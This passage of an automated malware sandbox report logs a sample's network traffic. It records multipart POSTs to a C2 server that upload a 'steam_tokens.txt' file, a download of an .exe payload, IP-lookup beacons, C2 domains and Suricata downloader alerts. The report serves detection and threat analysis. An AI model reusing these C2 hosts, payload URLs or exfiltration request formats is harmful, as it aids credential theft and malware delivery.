2d 2d 2d 47 44 47 48 49 44 42 4b 4a 45 47 49 45 43 42 47 49 45 48 43 2d 2d 0d 0a Data Ascii: ------GDGHIDBKJEGIECBGIEHCContent-Disposition: form-data; name="token"f8437865ef1969a8f990d3a109a91f147fad0529b215d801a9f3c397a34a07feca3e4715------GDGHIDBKJEGIECBGIEHCContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GDGHIDBKJEGIECBGIEHCContent-Disposition: form-data; name="file"------GDGHIDBKJEGIECBGIEHC--
                            Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCAEGDHJKFHJKFIJKJEHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 34 33 37 38 36 35 65 66 31 39 36 39 61 38 66 39 39 30 64 33 61 31 30 39 61 39 31 66 31 34 37 66 61 64 30 35 32 39 62 32 31 35 64 38 30 31 61 39 66 33 63 33 39 37 61 33 34 61 30 37 66 65 63 61 33 65 34 37 31 35 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 4b 4a 45 2d 2d 0d 0a Data Ascii: ------EHCAEGDHJKFHJKFIJKJEContent-Disposition: form-data; name="token"f8437865ef1969a8f990d3a109a91f147fad0529b215d801a9f3c397a34a07feca3e4715------EHCAEGDHJKFHJKFIJKJEContent-Disposition: form-data; name="message"ybncbhylepme------EHCAEGDHJKFHJKFIJKJE--
                            Source: global trafficHTTP traffic detected: GET /ldms/66fbfcc9963ca_ldfsna.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDAEBGIDBGHIECBGHJDHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 41 45 42 47 49 44 42 47 48 49 45 43 42 47 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 34 33 37 38 36 35 65 66 31 39 36 39 61 38 66 39 39 30 64 33 61 31 30 39 61 39 31 66 31 34 37 66 61 64 30 35 32 39 62 32 31 35 64 38 30 31 61 39 66 33 63 33 39 37 61 33 34 61 30 37 66 65 63 61 33 65 34 37 31 35 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 41 45 42 47 49 44 42 47 48 49 45 43 42 47 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 41 45 42 47 49 44 42 47 48 49 45 43 42 47 48 4a 44 2d 2d 0d 0a Data Ascii: ------EGDAEBGIDBGHIECBGHJDContent-Disposition: form-data; name="token"f8437865ef1969a8f990d3a109a91f147fad0529b215d801a9f3c397a34a07feca3e4715------EGDAEBGIDBGHIECBGHJDContent-Disposition: form-data; name="message"wkkjqaiaxkhb------EGDAEBGIDBGHIECBGHJD--
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: Joe Sandbox ViewIP Address: 46.8.231.109 46.8.231.109
                            Source: Joe Sandbox ViewIP Address: 49.12.197.9 49.12.197.9
                            Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                            Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                            Source: Joe Sandbox ViewASN Name: FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics
                            Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                            Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                            Source: unknownDNS query: name: api.ipify.org
                            Source: unknownDNS query: name: api.ipify.org
                            Source: unknownDNS query: name: api64.ipify.org
                            Source: unknownDNS query: name: ipinfo.io
                            Source: unknownDNS query: name: iplogger.org
                            Source: unknownDNS query: name: api.ipify.org
                            Source: unknownDNS query: name: api.ipify.org
                            Source: unknownDNS query: name: api.ipify.org
                            Source: unknownDNS query: name: api.ipify.org
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49708 -> 104.26.12.205:80
                            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49725 -> 147.45.44.104:80
                            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49726 -> 147.45.44.104:80
                            Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:58515 -> 46.8.231.109:80
                            Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:58519 -> 147.45.44.104:80
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58522 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58527 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58532 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:58528 -> 104.26.12.205:80
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58535 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58539 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58542 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58544 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58546 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58547 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58545 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58548 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58549 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58551 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58552 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58553 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58554 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58556 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58558 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58555 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58560 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58565 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:58568 -> 147.45.44.104:80
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58557 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58571 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58581 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58574 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58578 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:58580 -> 46.8.231.109:80
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58587 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:58588 -> 46.8.231.109:80
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58589 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:58590 -> 46.8.231.109:80
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58591 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:58593 -> 147.45.44.104:80
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58594 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58598 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58597 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58602 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58623 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58628 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58620 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58636 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58625 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58635 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58624 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58638 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58629 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58632 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:58608 -> 104.26.12.205:80
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58622 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58621 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58639 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58633 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:58641 -> 104.26.12.205:80
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58647 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58646 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58648 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:58649 -> 104.26.12.205:80
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:58668 -> 104.26.12.205:80
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:58689 -> 104.26.12.205:80
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:58685 -> 104.26.12.205:80
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:58727 -> 104.26.12.205:80
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:58730 -> 104.26.12.205:80
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:58734 -> 104.26.13.205:80
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:58721 -> 104.26.12.205:80
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:58765 -> 104.26.13.205:80
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:58769 -> 104.26.13.205:80
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58592 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:58645 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:58767 -> 104.26.13.205:80
                            Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: api64.ipify.org
                            Source: global trafficHTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: ipinfo.io
                            Source: global trafficHTTP traffic detected: GET /1nhuM4.js HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: iplogger.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: questionsmw.store
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: soldiefieop.site
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: abnomalrkmu.site
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKEGDAKEHJDHIDHJJDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: treatynreit.site
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIEBKEHCAKFCBFIDAAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: snarlypagowo.site
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mysterisop.site
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCBAEHCAEGDHJKFHJKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: absorptioniw.site
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHCAKKJDBKKFHJJDHIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
